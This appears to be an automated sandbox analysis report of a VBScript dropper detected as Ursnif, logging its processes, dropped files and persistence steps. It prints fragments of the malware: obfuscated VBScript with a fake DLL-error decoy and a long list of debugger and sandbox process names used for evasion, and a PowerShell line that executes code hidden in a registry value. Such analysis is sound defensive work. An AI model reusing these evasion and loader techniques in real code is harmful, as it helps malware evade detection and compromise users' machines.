                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F22102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{B68F86DF-9DC3-5870-D74A-210CFB1EE500}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_01
                    Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{F660447E-DDE3-9893-178A-614C3B5E2540}
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: sample.vbsStatic file information: File size 1397160 > 1048576
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdbXP=a source: powershell.exe, 00000016.00000002.885459267.00000200B1696000.00000004.00000001.sdmp
                    Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.540443568.000001C497429000.00000004.00000001.sdmp, fum.cpp.0.dr
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdbXP=a source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    VBScript performs obfuscated calls to suspicious functionsShow sources
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
                    Suspicious powershell command line foundShow sources
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F27AB0 push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F27E1F push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0575528F push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05745529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'

                    Persistence and Installation Behavior:

                    barindex
                    Creates processes via WMIShow sources
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dllJump to dropped file
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Yara detected UrsnifShow sources